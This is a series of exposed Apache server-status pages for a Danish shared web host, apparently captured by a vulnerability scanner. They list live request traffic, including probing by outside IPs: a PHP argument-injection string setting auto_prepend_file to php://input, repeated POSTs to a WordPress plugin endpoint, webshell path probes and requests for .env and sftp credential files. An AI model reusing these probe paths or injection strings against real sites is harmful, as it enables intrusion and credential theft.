/wp-json/tdw/save_css HTTP/1.0 16-3-0/0/410. 0.11151600.00.000.15 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-3-0/0/410. 0.13151200.00.000.16 47.128.28.34webhotel5.webhosting.dksue_8_2014&p=smartViewer&page=164&publicationName=temp HTTP/1.0 18-3-0/0/410. 0.10149900.00.000.19 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-3-0/0/408. 0.14149700.00.000.18 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-3-0/0/408. 0.15149300.00.000.14 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-3-0/0/409. 0.10149100.00.000.16 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-3-0/0/409. 0.15148310.00.000.13 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 23-3-0/0/409. 0.12148200.00.000.23 97.80.222.109webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 24-3-0/0/409. 0.14147810.00.000.28 185.211.59.11webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 25-3138670/38/436_ 0.09010.00.010.57 172.105.16.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 26-3138680/36/430W 0.09000.00.010.14 172.105.16.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 27-3138690/37/431_ 0.073800.00.010.18 69.171.251.1webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 28-3138700/37/431_ 0.073960.00.010.33 138.197.81.12webhotel5.webhosting.dkGET / HTTP/1.0 29-3-0/0/389. 0.12152100.00.000.13 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-3-0/0/371. 0.1399060.00.000.14 171.225.184.161webhotel5.webhosting.dkGET / HTTP/1.0 31-3138240/39/390_ 0.072100.00.111.21 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-3138420/38/191_ 0.092000.00.010.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-3138430/38/191_ 0.091200.00.020.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-3138710/37/190_ 0.073750.00.100.14 69.171.251.12webhotel5.webhosting.dkGET / HTTP/1.0 35-3138720/37/140_ 0.083500.00.050.08 13.38.70.4webhotel5.webhosting.dkGET /wordpress/ HTTP/1.0 36-3138730/37/90_ 0.093500.00.020.03 13.38.70.4webhotel5.webhosting.dkGET /wp/ HTTP/1.0 37-3138740/37/90_ 0.073500.00.010.03 13.38.70.4webhotel5.webhosting.dkGET /blog/ HTTP/1.0 38-3138750/37/72_ 0.093400.00.010.02 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-3138760/37/72_ 0.083400.00.010.03 13.38.70.4webhotel5.webhosting.dkGET /old/ HTTP/1.0 40-3138770/37/72_ 0.073200.00.010.02 202.78.28.21webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 41-3138780/37/37_ 0.093120.00.010.01 13.38.70.4webhotel5.webhosting.dkGET /new/ HTTP/1.0 42-3138790/37/37_ 0.092900.00.010.01 13.38.70.4webhotel5.webhosting.dkGET /test/ HTTP/1.0 43-3138800/37/37_ 0.102800.00.010.01 13.38.70.4webhotel5.webhosting.dkGET /temp/ HTTP/1.0 44-3138810/37/37_ 0.082800.00.010.01 13.38.70.4webhotel5.webhosting.dkGET /backup/ HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3c61a1154
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 04-Oct-2024 17:42:07 CEST Restart Time: Friday, 04-Oct-2024 16:05:04 CEST Parent Server Generation: 1 Server uptime: 1 hour 37 minutes 3 seconds Total accesses: 8359 - Total Traffic: 12.4 MB CPU Usage: u1.52 s.86 cu0 cs0 - .0409% CPU load 1.44 requests/sec - 2240 B/second - 1560 B/request 1 requests currently being processed, 41 idle workers ________________________......__.____W___________............... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1286810/17/258_ 0.06442560.00.010.37 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 1-1282560/20/261_ 0.032910.00.010.11 145.239.10.137webhotel5.webhosting.dkGET /admin.php HTTP/1.0 2-1284890/19/260_ 0.0437410.00.011.01 81.19.232.105www.tutak.dkGET /NAVWEB/plc/7/6/d40bba2421a2be7f945e6ee7567.html HTTP/1.0 3-1285420/19/260_ 0.043630.00.010.26 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 4-1284700/18/255_ 0.0542180.00.010.37 34.48.210.213webhotel5.webhosting.dkGET / HTTP/1.0 5-1285450/19/254_ 0.0412100.00.010.20 34.48.210.213webhotel5.webhosting.dkGET / HTTP/1.0 6-1285460/19/256_ 0.031700.00.010.30 202.83.111.78webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-1286820/18/255_ 0.0554160.00.010.76 198.235.24.193webhotel5.webhosting.dkGET / HTTP/1.0 8-1286830/18/255_ 0.044310.00.010.19 34.48.210.213webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 9-1286980/18/255_ 0.05060.00.010.14 64.226.78.121webhotel5.webhosting.dkGET / HTTP/1.0 10-1286850/18/254_ 0.032300.00.010.47 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-1286960/18/255_ 0.032910.00.010.32 145.239.10.137webhotel5.webhosting.dkGET /base.php HTTP/1.0 12-1286970/18/252_ 0.022910.00.010.17 145.239.10.137webhotel5.webhosting.dkGET /cron.php HTTP/1.0 13-1286990/19/253_ 0.043930.00.010.15 2.104.75.87webhotel5.webhosting.dkGET / HTTP/1.0 14-1286690/18/252_ 0.046100.00.010.54 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-1287000/17/251_ 0.055100.00.010.42 47.128.113.4webhotel5.webhosting.dkGET /kunstskolen/ HTTP/1.0 16-1287040/18/252_ 0.04000.00.010.40 64.226.78.121webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 17-1287050/18/252_ 0.04000.00.010.45 64.226.78.121webhotel5.webhosting.dkGET /server HTTP/1.0 18-1287060/18/250_ 0.03010.00.010.62 64.226.78.121webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 19-1287340/17/251_ 0.036800.00.010.47 20.169.44.107webhotel5.webhosting.dkGET /wp-admin/images/xmrlpc.php?p= HTTP/1.0 20-1287350/17/251_ 0.036800.00.010.45 20.169.44.107webhotel5.webhosting.dkGET /images/xmrlpc.php?p= HTTP/1.0 21-1287360/16/250_ 0.036200.00.010.10 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-1287370/17/250_ 0.036700.00.012.60 20.169.44.107webhotel5.webhosting.dkGET /wp-admin/css/colors/xmrlpc.php?p= HTTP/1.0 23-1287380/17/251_ 0.046800.00.010.08 20.169.44.107webhotel5.webhosting.dkGET /wp-admin/js/widgets/xmrlpc.php?p= HTTP/1.0 24-1-0/0/234. 0.1240700.00.000.17 20.169.44.36webhotel5.webhosting.dkGET /wp-admin/js/about.php HTTP/1.0 25-1-0/0/234. 0.1140700.00.000.07 20.169.44.36webhotel5.webhosting.dkGET /.well-known/pki-validation/about.php HTTP/1.0 26-1-0/0/233. 0.1040710.00.000.11 20.169.44.36webhotel5.webhosting.dkGET /wp-includes/pomo/about.php HTTP/1.0 27-1-0/0/234. 0.1140700.00.000.24 20.169.44.36webhotel5.webhosting.dkGET /wp-content/updraft/about.php HTTP/1.0 28-1-0/0/202. 0.0940700.00.000.07 20.169.44.36webhotel5.webhosting.dkGET /wp-includes/block-patterns/about.php HTTP/1.0 29-1-0/0/201. 0.1140600.00.000.11 20.169.44.36webhotel5.webhosting.dkGET /wp-content/upgrade-temp-backup/about.php HTTP/1.0 30-1245130/33/183_ 0.104110.00.010.14 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-1287010/18/168_ 0.04060.00.010.16 64.226.78.121webhotel5.webhosting.dkGET / HTTP/1.0 32-1-0/0/150. 0.1340610.00.000.08 20.169.44.36webhotel5.webhosting.dkGET /wp-content/themes/about.php HTTP/1.0 33-1287070/18/118_ 0.03000.00.010.09 64.226.78.121webhotel5.webhosting.dkGET /about HTTP/1.0 34-1287080/18/68_ 0.03000.00.010.10 64.226.78.121webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 35-1287090/18/18_ 0.04010.00.010.01 64.226.78.121webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 36-1287100/18/18_ 0.04000.00.010.01 64.226.78.121webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 37-1287110/17/17W 0.03000.00.010.01 64.226.78.121webhotel5.webhosting.dkGET /server-status HTTP/1.0 38-1287390/17/17_ 0.036700.00.010.01 20.169.44.107webhotel5.webhosting.dkGET /wp-admin/includes/xmrlpc.php?p= HTTP/1.0 39-1287400/17/17_ 0.046300.00.010.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 40-1287410/17/17_ 0.026700.00.010.01 20.169.44.107webhotel5.webhosting.dkGET /wp-admin/css/colors/blue/xmrlpc.php?p= HTTP/1.0 41-1287420/17/17_ 0.056700.00.010.01 20.169.44.107webhotel5.webhosting.dkGET /wp-admin/xmrlpc.php?p= HTTP/1.0 42-1287430/17/17_ 0.036300.00.010.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 43-1287440/18/18_ 0.056200.00.010.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 44-1287450/17/17_ 0.026200.00.010.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 45-1287460/17/17_ 0.036200.00.010.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 46-1287470/17/17_ 0.036100.00.010.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 47-1287480/17/17_ 0.065500.00.010.01 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 48-1287490/17/17_ 0.034910.00.010.01 54.36.148.41webhotel5.webhosting.dkGET /drops-karisma/878-karisma-lys-gragron.html HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3c37b7ad4
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 18-Jul-2024 06:00:50 CEST Restart Time: Thursday, 18-Jul-2024 04:00:05 CEST Parent Server Generation: 2 Server uptime: 2 hours 45 seconds Total accesses: 8232 - Total Traffic: 3.9 MB CPU Usage: u.39 s.14 cu0 cs0 - .00732% CPU load 1.14 requests/sec - 568 B/second - 499 B/request 1 requests currently being processed, 29 idle workers ____________________W_____._...___.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-2396340/1/258_ 0.0011120.00.000.09 66.249.64.46www.discteknik.dkGET /robots.txt HTTP/1.0 1-2396270/1/257_ 0.004220.00.000.08 121.123.104.2webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 2-2396240/1/258_ 0.00040.00.000.08 194.67.207.55webhotel5.webhosting.dkHEAD / HTTP/1.0 3-2396250/2/259_ 0.00000.00.000.07 206.81.24.227webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 4-2396280/1/258_ 0.003130.00.000.07 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 5-2396290/1/258_ 0.002200.00.000.15 196.250.158.207webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 6-2396300/1/257_ 0.001600.00.000.08 91.92.243.143webhotel5.webhosting.dkGET /wp-content/uploads/ HTTP/1.0 7-2396310/1/257_ 0.001440.00.000.10 168.151.126.220webhotel5.webhosting.dkGET / HTTP/1.0 8-2396350/1/257_ 0.001000.00.000.07 112.133.195.2webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 9-2396360/1/257_ 0.001030.00.000.12 66.249.64.46www.discteknik.dkGET /Ducati/Ducati.htm HTTP/1.0 10-2396370/1/257_ 0.001040.00.000.11 162.216.149.54webhotel5.webhosting.dkGET / HTTP/1.0 11-2396380/1/257_ 0.00500.00.000.11 91.92.243.143webhotel5.webhosting.dkGET /wp-includes/ HTTP/1.0 12-2396390/1/257_ 0.00200.00.000.10 81.19.232.105www.brandstation.infoGET /wp-login.php HTTP/1.0 13-2396400/1/257_ 0.00080.00.000.07 17.241.75.25webhotel5.webhosting.dkGET /diplom/print/?ID=5176&YEAR=2017&mode=common HTTP/1.0 14-2396410/1/257_ 0.00040.00.000.12 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 15-2396420/1/255_ 0.00040.00.000.07 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 16-2396620/1/256_ 0.00020.00.000.08 206.81.24.227webhotel5.webhosting.dkGET /server HTTP/1.0 17-2396870/1/256_ 0.00000.00.000.65 206.81.24.227webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 18-2397100/1/256_ 0.00010.00.000.07 206.81.24.227webhotel5.webhosting.dkGET /about HTTP/1.0 19-2397300/1/256_ 0.00010.00.000.08 206.81.24.227webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 20-2397490/0/255W 0.03000.00.000.09 206.81.24.227webhotel5.webhosting.dkGET /server-status HTTP/1.0 21-2397700/0/255_ 0.034100.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 22-2397720/0/255_ 0.034000.00.000.09 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 23-2397740/0/255_ 0.023900.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 24-2397850/0/255_ 0.023800.00.000.16 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 25-2398000/0/253_ 0.023700.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 26-1-0/0/245. 0.014700.00.000.12 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 27-2396230/5/212_ 0.00000.00.000.16 206.81.24.227webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 28-1-0/0/185. 0.08103600.00.000.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-1-0/0/200. 0.081111100.00.000.05 66.249.70.138webhotel5.webhosting.dkGET / HTTP/1.0 30-1-0/0/185. 0.0953960.00.000.14 194.67.210.77webhotel5.webhosting.dkHEAD / HTTP/1.0 31-2396260/2/158_ 0.00010.00.000.05 206.81.24.227webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 32-2396320/1/122_ 0.001410.00.000.04 168.151.126.220webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 33-2396330/1/122_ 0.001310.00.000.13 156.59.198.136webhotel5.webhosting.dkd9f23c/f_og_u_kultur_i_klinisk_praksis_NY_pr040414.pdf HTTP/1.0 34-0-0/0/85. 0.05364500.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-0-0/0/50. 0.07532500.00.000.01 181.214.218.67webhotel5.webhosting.dkGET /mall.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3551dc1b9
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 16-Jul-2024 08:57:41 CEST Restart Time: Tuesday, 16-Jul-2024 06:05:04 CEST Parent Server Generation: 2 Server uptime: 2 hours 52 minutes 36 seconds Total accesses: 10959 - Total Traffic: 7.7 MB CPU Usage: u1.86 s.89 cu0 cs0 - .0266% CPU load 1.06 requests/sec - 779 B/second - 736 B/request 1 requests currently being processed, 30 idle workers ______.__.__.___W____.........._____________.................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-2113250/33/351_ 0.04230.00.010.12 172.105.16.131webhotel5.webhosting.dkGET / HTTP/1.0 1-2113260/33/350_ 0.06720.00.010.40 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 2-2113290/33/346_ 0.05230.00.010.11 172.105.16.131webhotel5.webhosting.dkGET / HTTP/1.0 3-2113300/33/345_ 0.04100.00.010.10 172.105.16.131webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 4-2113310/33/346_ 0.05100.00.010.22 172.105.16.131webhotel5.webhosting.dkGET /server HTTP/1.0 5-2113370/33/346_ 0.05100.00.010.10 172.105.16.131webhotel5.webhosting.dkGET /about HTTP/1.0 6-2-0/0/313. 0.06130800.00.000.09 193.37.32.204webhotel5.webhosting.dkGET /wp-content/uploads/help.php HTTP/1.0 7-2113320/33/346_ 0.05100.00.090.23 172.105.16.131webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 8-2113380/33/346_ 0.05000.00.010.14 172.105.16.131webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 9-2-0/0/313. 0.08130800.00.000.11 193.37.32.204webhotel5.webhosting.dkGET /.well-known/js.php HTTP/1.0 10-2113390/33/344_ 0.04000.00.010.10 172.105.16.131webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 11-2113480/32/345_ 0.052300.00.010.10 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-2-0/0/286. 0.09130810.00.000.42 34.22.192.129www.vennegaard.comGET / HTTP/1.0 13-2113220/33/347_ 0.06900.00.680.83 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 14-2113490/32/296_ 0.052230.00.010.11 208.100.26.248webhotel5.webhosting.dkGET / HTTP/1.0 15-2113400/33/296_ 0.06000.00.010.09 172.105.16.131webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 16-2113410/32/295W 0.05000.00.010.10 172.105.16.131webhotel5.webhosting.dkGET /server-status HTTP/1.0 17-2113420/32/295_ 0.052400.00.010.13 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-2113430/32/295_ 0.052400.00.010.14 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 19-2113500/32/293_ 0.062200.00.010.12 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-2113510/32/295_ 0.062200.00.010.10 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-2-0/0/263. 0.06130800.00.000.09 193.37.32.204webhotel5.webhosting.dkGET /admin-post.php HTTP/1.0 22-2-0/0/262. 0.08130800.00.000.08 193.37.32.204webhotel5.webhosting.dkGET /data.php HTTP/1.0 23-2-0/0/262. 0.07130800.00.000.17 193.37.32.204webhotel5.webhosting.dkGET /rc.php HTTP/1.0 24-2-0/0/263. 0.08130700.00.000.16 193.37.32.204webhotel5.webhosting.dkGET /.well-known/index.php HTTP/1.0 25-2-0/0/263. 0.07130700.00.000.08 193.37.32.204webhotel5.webhosting.dkGET /wp-content/plugins/fix/up.php HTTP/1.0 26-2-0/0/261. 0.08130700.00.000.08 193.37.32.204webhotel5.webhosting.dkGET /log.php HTTP/1.0 27-2-0/0/262. 0.09130700.00.000.10 193.37.32.204webhotel5.webhosting.dkGET /images/class.engine.php HTTP/1.0 28-2-0/0/261. 0.07130700.00.000.08 91.92.243.143webhotel5.webhosting.dkGET /wp-admin/ HTTP/1.0 29-2-0/0/261. 0.09130700.00.000.14 193.37.32.204webhotel5.webhosting.dkGET /js/be.php HTTP/1.0 30-2-0/0/228. 0.08128900.00.000.07 193.37.32.204webhotel5.webhosting.dkT /wp-includes/js/tinymce/plugins/compat3x/content.php HTTP/1.0 31-2113440/32/205_ 0.042300.00.010.09 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-2113520/32/155_ 0.041800.00.020.06 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-2113530/32/155_ 0.042120.00.010.05 208.100.26.247webhotel5.webhosting.dkGET / HTTP/1.0 34-2113540/31/131_ 0.051900.00.010.04 70.164.30.202webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 35-2113550/32/132_ 0.051830.00.150.22 159.65.163.169webhotel5.webhosting.dkGET / HTTP/1.0 36-2113560/32/82_ 0.051800.00.010.02 166.205.132.14webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 37-2113570/32/82_ 0.061300.00.010.02 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 38-2113580/32/82_ 0.051200.00.010.02 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-2113590/32/82_ 0.061200.00.460.47 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 40-2113600/32/82_ 0.051100.00.010.48 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-2113610/32/82_ 0.041000.00.010.06 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 42-2113620/32/82_ 0.041000.00.340.40 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 43-2113630/32/82_ 0.05800.00.640.70 51.222.253.9webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 44-1-0/0/50. 0.07503700.00.000.07 45.40.166.83webhotel5.webhosting.dkHEAD /BLOG HTTP/1.0 45-1-0/0/50. 0.07503500.00.000.07 66.249.66.18webhotel5.webhosting.dkGET /resultater/details/?id=3481 HTTP/1.0 46-1-0/0/50. 0.07502960.00.000.01 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3976c2de1
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 14-Jul-2024 10:11:31 CEST Restart Time: Sunday, 14-Jul-2024 06:05:04 CEST Parent Server Generation: 4 Server uptime: 4 hours 6 minutes 26 seconds Total accesses: 18953 - Total Traffic: 12.3 MB CPU Usage: u.63 s.24 cu0 cs0 - .00588% CPU load 1.28 requests/sec - 871 B/second - 679 B/request 1 requests currently being processed, 30 idle workers ____________W______....____________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-4204030/10/594_ 0.01920.00.000.34 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 1-4204190/10/571_ 0.01300.00.000.38 68.183.180.73webhotel5.webhosting.dkGET /server HTTP/1.0 2-4203690/10/608_ 0.015810.00.000.28 66.249.79.128webhotel5.webhosting.dkGET /index_p_login.html HTTP/1.0 3-4204550/10/567_ 0.01100.00.000.23 68.183.180.73webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 4-4203770/10/591_ 0.016400.00.000.36 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-4203710/11/607_ 0.01300.00.000.32 68.183.180.73webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 6-4203780/10/601_ 0.015990.00.000.25 36.138.205.155webhotel5.webhosting.dkPOST / HTTP/1.0 7-4203700/10/601_ 0.011510.00.000.38 81.19.232.105www.abstrax.dkGET /samarb.html HTTP/1.0 8-4203850/10/584_ 0.025100.00.000.28 186.226.55.3webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 9-4203860/10/599_ 0.005000.00.000.32 52.167.144.145webhotel5.webhosting.dkGET /sitemap_index.xml HTTP/1.0 10-4203870/10/583_ 0.022100.00.000.30 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-4205130/10/583_ 0.02010.00.000.35 68.183.180.73webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 12-4205650/9/582W 0.01000.00.000.31 68.183.180.73webhotel5.webhosting.dkGET /server-status HTTP/1.0 13-4205810/9/538_ 0.016600.00.000.24 52.167.144.181webhotel5.webhosting.dkGET /sitemap.xml HTTP/1.0 14-4206480/9/595_ 0.006100.00.000.37 36.138.205.155webhotel5.webhosting.dkGET /.env HTTP/1.0 15-4206710/9/579_ 0.015300.00.000.38 194.36.174.90webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 16-4207130/9/528_ 0.002100.00.000.33 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-4207480/9/529_ 0.002100.00.000.32 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-4242980/5/486_ 0.00100.00.000.28 68.183.180.73webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 19-3-0/0/480. 0.05271910.00.000.29 193.176.211.48webhotel5.webhosting.dkGET /cache/ HTTP/1.0 20-3-0/0/480. 0.05271800.00.000.32 193.176.211.48webhotel5.webhosting.dkGET /wp-content/uploads/gravity_forms/ HTTP/1.0 21-3-0/0/481. 0.05271800.00.000.27 193.176.211.48webhotel5.webhosting.dkGET /wp-admin/meta/ HTTP/1.0 22-3-0/0/498. 0.05265100.00.000.48 